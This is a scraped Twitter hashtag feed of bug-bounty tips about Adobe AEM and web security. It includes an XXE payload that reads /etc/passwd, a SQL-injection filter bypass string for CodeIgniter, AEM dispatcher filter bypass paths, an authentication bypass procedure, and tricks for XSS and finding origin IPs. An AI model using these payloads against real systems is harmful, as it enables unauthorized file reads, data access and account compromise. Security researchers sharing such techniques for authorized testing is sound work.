Top Tweets for #AEMsecurity
AEM guideContainer XXE?
guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<%3fxml+version%3d\"1.0\"+encoding%3d\"utf-8\"%3f><!DOCTYPE+afData+[<!ENTITY+a+SYSTEM+\"file%3a///etc/passwd\">]><afData>%26a%3b</afData>"}}}
#AEMSecurity
![AEMSecurity's tweet photo](https://pbs.twimg.com/media/GcqrLvrXIAEFI8B.png)
[+] #BugbountyTip Take your time, Do Not Rush!
Using GAU I found cached tokens lacking proper expiration. This misconfiguration resulted in unauthorized access to multiple user accounts! Need for secure token lifecycle management yeah? ;) #AEMSecurity #Bugbountytips
![AEMSecurity's tweet photo](https://pbs.twimg.com/media/GcqkxQmWgAAXpqg.jpg)
A 0-click pre-auth RCE (root) exploit for LiteSpeed CyberPanel was released on 27th October and is being actively exploited. If anyone is still using version 2.3.6, immediately upgrade it to the latest version 2.3.7!
#AEMSecurity #0day #Security

[+] Using Google dorks for unique subdomains?
Try this:
site:*-*-*.yourtarget.com
site:*-*.*.yourtarget.com
site:*.*.*.yourtarget.com
#bugbountytips
#bugbountytip
#AEMSecurity
[+] Payload: validstring+union+select+'1','1','1',@@version+from+tablename--+'`--
A working bypass of the CodeIgniter framework's protection against SQLi
#bugbountytips
#AEMSecurity
#bugbounty
[+] BugbountyTip:
Target hiding behind Cloudflare? Try using Spiderfoot or similar OSINT tools.
9 out of 10 times I was able to find the original IP subnet of the target, allowing me to access the website directly! win/win!
#AEMSecurity #bugbountytip #bugbounty
[+] POC Video Microsoft Sharepoint Filter Bypass!
Looking back in time, I found an interesting filter bypass that resulted in a "Stored XSS" vulnerability affecting Microsoft SharePoint 2013 in Office 365 (cloud)
https://t.co/HmnJuRvdVM
#AEMSecurity #bugbountytips #bugbounty
A custom script written back in 2015 (when I discovered my first AEM bug CVE-2016-0956) still finds valid AEM bugs! amazing!!
#AEMSecurity #bugbountytip

[+] Filter bypass techniques:
Sometimes you can do amazing things just by appending /? to bypass access control restrictions ;)
#AEMSecurity #FilterBypass #bugbountytips #bugbountytip
![AEMSecurity's tweet photo](https://pbs.twimg.com/media/GFgXHe9bwAAKZh9.png)
If you are looking for XSS and come across an input form, let's say "description": instead of injecting your payload on the very first line, skip the first two, i.e. press enter or something, and then inject your payload on the next line instead.. #bugbountytips #XSS #AEMSecurity
[+] Auth Bypass:
Find valid endpoints redirecting to login page.
Register new user, provide 1 in all input fields.
SUBMIT form, of course you're going to get an error, IGNORE and simply access endpoints you enumerated earlier...
#bugbountytips
#pentesting
#AEMSecurity
![AEMSecurity's tweet photo](https://pbs.twimg.com/media/FuYqS4FaIAItx4q.jpg)
Oh and /conten.json too... Idea is simple, just improvise! think like a kid and play around with AEM! That's why I've always loved this piece of software so much when it comes to learning different techniques!
#AEMsecurity
[+] Another awesome Adobe AEM Dispatcher filter bypass technique? oh okay
Hunting for JSON GET Servlet on /content.1.json however result = 404?
Try this:
/conten/.1.json
/conten/t.1.json
/content.tidy.1.json
/conten/.tidy.infinity.json
#AEMSecurity #bugbountytips #pentesting
[+] Important Update:
Hi, I know I've been inactive on Twitter for a while and haven't shared much but guess what?
I am back!
Stay tuned!! I will be sharing an amazing AEM dispatcher filter bypass trick that I've used over the years! =)
#AEMSecurity #bugbountytips
[+] Adobe AEM tips and tricks:
At times, encoding special characters within HTTP params allows us to bypass AEM Filters:
POST /content/endpoint
Host: asjas
Blah: blah
Bleh: Bleh
param:body=TEST
Doesn't work? try this:
param%3Abody=TEST<----
#aemsecurity #bugbountytips
Adobe AEM dispatcher filter rules bypass triggered XSS on LinkedIn... https://t.co/kxLyxe8Uir via @YouTube #AEMSecurity
Amazed to see CVE-2016-0956 Apache Sling POST Servlet vulnerability discovered back in 2014 still works!!!!!! #AEMSecurity #bugbountytips #bugbountytips

https://t.co/xwh784N2uA <--- me
#AEMSecurity
Amazing it is when & if you are actually able to pull it off in the end with a working POC finally proving your point & getting paid with their highest bounty :) #AEMSecurity
[+] #bugbountytips
You really need to analyze logs manually via "Logger" when using Burp Suite.
I confirmed 4 HTTP Request smuggling issues + 2 SSRFs and these issues were not flagged by Burp scanner so yup! see what I mean?
#AEMSecurity #bugbountytip